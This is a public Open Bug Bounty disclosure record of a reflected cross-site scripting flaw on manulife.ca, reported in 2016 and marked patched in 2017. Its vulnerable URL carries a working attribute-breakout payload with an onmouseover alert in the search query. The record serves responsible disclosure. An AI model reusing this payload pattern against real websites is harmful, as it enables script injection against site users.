manulife.ca XSS vulnerability

2016-09-12T23:35:00
ID OBB:181301
Type openbugbounty
Reporter ghozt
Modified 2017-02-04T05:58:00

Description

Vulnerable URL:
http://www.manulife.ca/wps/portal/manulifeca/Manulife.caHome/Manulife.ca/Generalsearch/!ut/p/b1/jZLJkqJAEIafpR_ApiiWwiMoILsFBSIXA21QUBSUtZ5-7I45zNbdk7eM-P6IzC-TSZiYSa5pXxzTtrhd08t7n4g7x1QUThN4oBNuCQyic6GNCHRU-AS2vwKSIEBg2MISmxxigQ7-L68bIFJJZEo8gBowhADwIrI5HXPf5TdMTLYALW_OoKpBj7t1IB23wYnuC_lOsO89coiL3o4XuFuxONUsV6iuwL-xTauNU5ZeFKySGVUCyU_agiym4wzGkRmI2bSbL7C9w6enkUN9N9HRXGwSJCTKNlkFKoJVcRm9hp_ISRDYLKXV3mywLnkRxokCUkOUZA1WEsjNrJ3Xt_ywxjfj3s52qgbdXkqHl5ef-4NPSv7Sn6yIf_r_G_jGX5Dfnw6T37F_XPED-OpMH8AXe2yfAPp0UB8whIkBvwvKqTbomfol9Q0S1i4pfQPQyHIAClyiDo7ru8EZTICG3KNUbKd0KAkHSlqyfov8UJGXlpw8JzKZpNhXr8OhegWvIpIQKyAgShByLOSYqAxFtHwYw3I9RfaJP13bM7YGtxS39sHVwtbcilHXzHY1b2jawwf13JvHHtcdhSqTZT1OyGWqeH5mSjLr-2elzbD3WDglpFieFcNm1Cg1mk7Qy4VPzBXi9cu6Lib5Mr5tLigXwKDxFp0IN93dcw50qLWCqPXUdPEYHA60FKi2y9-6RQZveCrR-sBplsfzbdyhsFFBd96bp6NrX1lu3meoiWft2Ndiro5W471_lru6VRlTV2HYWzZ_9iVW4o4vPwCbrazW/dl4/d5/L2dJQSEvUUt3QS80SmtFL1o2X01KQkIzRjU0MEdUM0QwSVRHM1VMN1QyTUUy/?query=%22+onmouseover%3Dalert%28%27OPENBUGBOUNTY%27%29+alt%3D%22ghozt
Details:

Description| Value
---|---
Patched:| Yes, at 03.02.2017
Latest check for patch:| 03.02.2017 14:44 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 63551
VIP website status:| No
Check manulife.ca SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 September, 2016 23:35 GMT
Generic security notifications sent to website owner| 12 September, 2016 23:38 GMT
Vulnerability details disclosed by researcher| 20 September, 2016 00:12 GMT
Vulnerability patched by the website owner| 4 February, 2017 05:58 GMT